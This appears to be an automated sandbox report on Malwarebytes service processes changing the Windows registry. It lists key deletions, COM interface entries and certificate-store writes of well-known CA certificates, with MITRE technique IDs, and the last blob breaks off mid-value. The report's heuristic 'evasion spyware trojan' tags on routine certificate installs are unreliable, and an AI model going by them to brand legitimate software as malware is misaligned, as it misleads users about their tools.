Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\Windows.Networking.BackgroundTransfer	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Extensions\ContractId\Windows.Launch\PackageId\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{993A5C11-A9B8-41E9-9088-C5182B1F279A}	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7196E77C-8EA5-4824-92C9-BAE8671149FA}\TypeLib\Version = "1.0"	MBAMService.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0167-ABCDEFFEDCBA}	regedit.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5D448EF3-7261-4C0C-909C-6D56043C259D}\TypeLib\Version = "1.0"	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E3D4AC2-A9AE-478A-91EE-79C35D3CA8C7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CE7ABFE9-8F8F-4EDD-86BD-9209FD072126}	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6C1047E9-9ADC-4F8A-8594-036375F53103}\TypeLib\Version = "1.0"	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EA248A19-F84E-4407-ADD3-8563AFD81269}	MBAMService.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4912 reg.exe

pid	process
4912	reg.exe

Modifies system certificate store 2 TTPs 21 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

MBAMInstallerService.exeMBAMService.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e2000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A\Blob = 0300000001000000140000005a8cef45d7a69859767a8c8b4496b578cf474b1a2000000001000000450500003082054130820329a0030201020213066c9fd29635869f0a0fe58678f85b26bb8a37300d06092a864886f70d01010c05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412032301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203230820222300d06092a864886f70d01010105000382020f003082020a0282020100ad969f2d9c4a4c4a81795199ec8acb6b605113bc4d6d06fcb0088ddd19106ac7260c35d8c06f2084e994b19b8503c35bdb4ae8c8f89076d95b4fe34ce806364dcc9aac3d0c902b92d4061960ac374479858182ad5a37e00dcc9da64c5276ea439db704d150f655e0d5d2a64985e937e9ca7eae5c954d489a3fae205a6d8895d934b8521a4390b0bf6c05b9b678b7ead0e43a3c125362ff4af27bbe3505a91234e3f36474622c3d00495a28fe3244bb87dd652702713bda4af71fdacdf72155904f0fecae82e19f6bd945d3bbf05f87ed3c2c3986da3fdeec7255eb79a3addbdd7cb0ba1ccefcde4f3576cf0ff8781f6a36514627615be99ecff0a2557d7c258a6f2fb4c5cf842e2bfd0d51106cfb5f1bbc1b7ec5ae3b98013192ff0b57f49ab2b957e9abef0d76d1f0eef4ce86a7e06ee9b469a1df69f633c6692e97139ea587b057108137c953b3bb7ff692d19cd018f4926eda834fa663994ca5fb5eef21647a205f6c648515cb37e9620c0b2a16dc012e32da3e4bf59e3af6174094ef9e910886fabe63a85a33eccb744395f96c695236c7296ffc55035c1ffb9fbd47ebe74947950b4e89220949e0f5611ef1bf2e8a726e8059ff573af97532a34e5feced2862d94d73f2cc811760edcdebdcdba7cac57e02bdf2540854fdb42d092c17544a98d154e1516708d2ed6e7e6f3fd22d81592966cb903995111e7427feddebaf0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414b00cf04c30f405580248fd33e552af4b84e36652300d06092a864886f70d01010c05000382020100aaa8808f0e78a3e0a2d4cde6f5987a3bea0003b0970e93bc5aa8f62c8c7287a9b1fc7f73fd637178a58759cf30e10d10b2135a6d82f56ae6809fa0050b68e4476bc76adfb6fd773272e518fa09f4a0932c5dd28c75857665900c0379b7312363ad788309866884cafff9cf269a9279e7cd4bc5e761a717cbf3a91293936ba7e82f5392c46058b0cc0251185b858d625963b6adb4de9afb26f70027c05d55377499c9507fe3592e44e32c25eeec4c3277b49f1ae94b5d20c5dafd1c8716c643e8d4bb269a45705ea90b3753e2467b27fde046f289b7cc42b6cb28266ed9a5c93ac8411360f7508c15aeb26d1a151a5778e6922ad96590823f6c02afae123a27963604d71da28063a99bf1e5bab47c14b04ec9b11f745f38f651ea9bfa2ca211d4a92d271a45b1afb24e710dc05846d66906cb53cbb3fe6b41cd417e7d4c0f7c72797a59cd5e4a0eac9ba99873797cb4f4ccb9b8070cb2745cb8c76f88a190a7f4aaf9bf673af41a15621eb79fbe3db129af67a112f25810195303301bb81a89f69cbd97038ea309f31d8b21f1b4dfe41cd19f650206ea5cd613b384efa2a55c8c7729a768c06bae40d2a8b4eacdf08d4b389c199a1b2854b88990efca75813e1ef26424c718af4eff479e07f63565a4d30a56fff517646cefa822254993b6df0017da587e5deec51bb0d1d15f2110c7f9f3ba020a2707c5f1d6c7d3e0fb09606c	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE\Blob = 030000000100000014000000f6108407d6f8bb67980cc2e244c2ebae1cef63be2000000001000000f6010000308201f230820178a0030201020213066c9fd7c1bb104c2943e5717b7b2cc81ac10e300a06082a8648ce3d0403033039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412034301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120343076301006072a8648ce3d020106052b8104002203620004d2ab8a374fa3530dfec18a7b4ba87b464b63b062f62d1bdb087121d200e863bd9a27fbf0396e5dea3da5c981aaa35b2098455d16dbfde8106de39ce0e3bd5f8462f3706433a0cb242f70ba88a12aa075f881ae6206c481db396e29b01efa2e5ca3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414d3ecc73a656ecce1da769a56fb9cf3866d57e581300a06082a8648ce3d040303036800306502303a8b21f1bd7e11add0ef58962fd6eb9d7e908d2bcf6655c32ce328a9700a470ef0375912ff2d9994284e2a4f354d335a023100ea75004e3bc43a941291c958469d211372a7889c8ae44c4adb96d4ac8b6b6b49125333add7e4be24fcb50a76d4a5bc10	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\1C58A3A8518E8759BF075B76B750D4F2DF264FCD\Blob = 0300000001000000140000001c58a3a8518e8759bf075b76b750d4f2df264fcd2000000001000000c2040000308204be308203a6a003020102021006d8d904d5584346f68a2fa754227ec4300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3231303431343030303030305a170d3331303431333233353935395a304f310b300906035504061302555331153013060355040a130c446967694365727420496e633129302706035504031320446967694365727420544c53205253412053484132353620323032302043413130820122300d06092a864886f70d01010105000382010f003082010a0282010100c14bb3654770bcdd4f58dbec9cedc366e51f311354ad4a66461f2c0aec6407e52edcdcb90a20eddfe3c4d09e9aa97a1d8288e51156db1e9f58c251e72c340d2ed292e156cbf1795fb3bb87ca25037b9a52416610604f571349f0e8376783dfe7d34b674c2251a6df0e9910ed57517426e27dc7ca622e131b7f238825536fc13458008b84fff8bea75849227b96ada2889b15bca07cdfe951a8d5b0ed37e236b4824b62b5499aecc767d6e33ef5e3d6125e44f1bf71427d58840380b18101faf9ca32bbb48e278727c52b74d4a8d697dec364f9cace53a256bc78178e490329aefb494fa415b9cef25c19576d6b79a72ba2272013b5d03d40d321300793ea99f50203010001a38201823082017e30120603551d130101ff040830060101ff020100301d0603551d0e04160414b76ba2eaa8aa848c79eab4da0f98b2c59576b9f4301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b06010505070302307606082b06010505070101046a3068302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304006082b060105050730028634687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7443412e63727430420603551d1f043b30393037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7443412e63726c303d0603551d2004363034300b06096086480186fd6c02013007060567810c01013008060667810c0102013008060667810c0102023008060667810c010203300d06092a864886f70d01010b050003820101008032ce5e0bdd6e5a0d0aafe1d684cbc08efa8570edda5db30cf72b7540fe850afaf33178b7704b1a8958ba80bdf36b1de97ecf0bba589c59d490d3fd6cfdd0986db771825bcf6d0b5a09d07bdec443d82aa4de9e41265fbb8f99cbddaee1a86f9f87fe74b71f1b20abb14fc6f5675d5d9b3ce9ff69f7616cd6d9f3fd36c6ab038876d24b2e7586e3fcd8557d26c21177df3e02b67cf3ab7b7a86366fb8f7d89371cf86df7330fa7babed2a59c842843b11171a52f3c90e147da25b7267ba71ed574766c5b8024a65345e8bd02a3c209c51994ce7529ef76b112b0d927e1de88aeb36164387ea2a63bf753febdec403bb0a3cf730efebaf4cfc8b3610733ef3a4	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\2AD974A775F73CBDBBD8F5AC3A49255FA8FB1F8C\Blob = 0300000001000000140000002ad974a775f73cbdbbd8f5ac3a49255fa8fb1f8c2000000001000000620400003082045e30820346a0030201020213077312380b9d6688a33b1ed9bf9ccda68e0e0f300d06092a864886f70d01010b05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412031301e170d3232303832333232323132385a170d3330303832333232323132385a303c310b3009060355040613025553310f300d060355040a1306416d617a6f6e311c301a06035504031313416d617a6f6e205253412032303438204d303130820122300d06092a864886f70d01010105000382010f003082010a0282010100eb712ca9cb1f8828923230af8a570f78b73725955587ac675c97d322c8daa214676b7cf067dae2032ab356125dc6b547f96708a7937a9592180fb4f9f910369a7f2f80b64fba134ec75d531ee0dd96330720d396bc12e4745042a1051373b54f9b4424fe2d7fedbc2285ec362133977506ce271882dce3d9c582078d5e26012626671fd93f13cf32ba6bad7864fcaaff0e023c07df9c0578728cfdea75b7032884dae86e078cd05085ef8154b2716eec6d62ef8f94c35ee9c4a4d091c02e249198caeeba258ed4f671b6fb5b6b38064837478d86dcf2ea06fb76377d9eff424e4d588293cfe271c278b17aab4b5b94378881e4d9af24aef872c565fb4bb451e70203010001a382015a3082015630120603551d130101ff040830060101ff020100300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b06010505070302301d0603551d0e0416041481b80e638a891218e5fa3b3b50959fe6e5901385301f0603551d230418301680148418cc8534ecbc0c94942e08599cc7b2104e0a08307b06082b06010505070101046f306d302f06082b060105050730018623687474703a2f2f6f6373702e726f6f746361312e616d617a6f6e74727573742e636f6d303a06082b06010505073002862e687474703a2f2f6372742e726f6f746361312e616d617a6f6e74727573742e636f6d2f726f6f746361312e636572303f0603551d1f043830363034a032a030862e687474703a2f2f63726c2e726f6f746361312e616d617a6f6e74727573742e636f6d2f726f6f746361312e63726c30130603551d20040c300a3008060667810c010201300d06092a864886f70d01010b05000382010100ad00de0205232e063262b46bb19416e41140de2bfa59c135efe0aa8f2b41b9d1f38739001df23db5a7470c0606c691f3075702d4edbd17c1909abf4875a2074f30dd4a6a42b50d3d15c00ffe845bc63c99cc5752b1d86e12d59692934b94e507e88982086a7a34d49e64e13d876a92909a63a14bf88fb6ea34d305be20c2de06e28c9f738b9f4d3985cace19369d85c99ec9f8503fb67e88a1efca84068b50b40a5ca61c44f1fdc8614060f26125aa07f4c7c27375e40c0b428d04e55f4448995b7b898196a7889d4b0d62e804c4d7feb4e8b26dcaecc01cbc385b1ddf85ce5b7ae3494b6cb9a7ddf405b249ade1c5146bc2ccebcd7fd65869bac3207e7fb0b8	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa22000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E\Blob = 0300000001000000140000000d44dd8c3c8c1a1a58756481e90f2e2affb3d26e2000000001000000ba010000308201b63082015ba0030201020213066c9fd5749736663f3b0b9ad9e89e7603f24a300a06082a8648ce3d0403023039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412033301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120333059301306072a8648ce3d020106082a8648ce3d030107034200042997a7c6417fc00d9be8011b56c6f252a5ba2db212e8d22ed7fac9c5d8aa6d1f73813b3b986b397c33a5c54e868e8017686245577d44581db337e56708eb66dea3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414abb6dbd7069e37ac3086079170c79cc419b178c0300a06082a8648ce3d0403020349003046022100e08592a317b78df92b06a593ac1a98686172fae1a1d0fb1c7860a64399c5b8c40221009c02eff1949cb396f9ebc62af8b62cfe3a901416d78c6324481cdf307dd5683b	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\1C58A3A8518E8759BF075B76B750D4F2DF264FCD	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\2AD974A775F73CBDBBD8F5AC3A49255FA8FB1F8C	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16\Blob = 0300000001000000140000008da7f965ec5efc37910f1c6e59fdc1cc6a6ede162000000001000000450300003082034130820229a0030201020213066c9fcf99bf8c0a39e2f0788a43e696365bca300d06092a864886f70d01010b05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412031301e170d3135303532363030303030305a170d3338303131373030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203130820122300d06092a864886f70d01010105000382010f003082010a0282010100b2788071ca78d5e371af478050747d6ed8d78876f49968f7582160f97484012fac022d86d3a0437a4eb2a4d036ba01be8ddb48c80717364cf4ee8823c73eeb37f5b519f84968b0ded7b976381d619ea4fe8236a5e54a56e445e1f9fdb416fa74da9c9b35392ffab02050066c7ad080b2a6f9afec47198f503807dca2873958f8bad5a9f948673096ee94785e6f89a351c0308666a14566ba54eba3c391f948dcffd1e8302d7d2d747035d78824f79ec4596ebb738717f2324628b843fab71daacab4f29f240e2d4bf7715c5e69ffea9502cb388aae50386fdbfb2d621bc5c71e54e177e067c80f9c8723d63f40207f2080c4804c3e3b24268e04ae6c9ac8aa0d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604148418cc8534ecbc0c94942e08599cc7b2104e0a08300d06092a864886f70d01010b0500038201010098f2375a4190a11ac57651282036230eaee628bbaaf894ae48a4307f1bfc248d4bb4c8a197f6b6f17a70c85393cc0828e39825cf23a4f9de21d37c8509ad4e9a753ac20b6a897876444718656c8d418e3b7f9acbf4b